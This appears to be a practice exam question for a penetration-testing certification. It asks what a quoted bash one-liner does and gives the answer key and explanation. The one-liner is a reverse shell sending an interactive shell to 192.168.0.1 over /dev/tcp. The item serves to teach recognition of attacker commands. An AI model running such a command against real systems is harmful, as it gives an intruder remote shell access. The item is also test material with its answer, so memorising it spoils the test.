CompTIA PenTest+ (PT0-001) — Question 2

The following line was found in an exploited machine's history file. An attacker ran the following command: bash -i >& /dev/tcp/192.168.0.1/80 0> &1
Which of the following describes what the command does?

Answer options

• A. Performs a port scan.
• B. Grabs the web server's banner.
• C. Redirects a TTY to a remote system.
• D. Removes error logs for the supplied IP.

Correct answer: C

Explanation

The command establishes a reverse shell by redirecting input and output to a remote system, effectively allowing the attacker to gain interactive access. Options A and B are incorrect as they describe different actions that do not match the command's purpose. Option D is also incorrect since the command does not involve removing logs but rather facilitates communication with a remote host.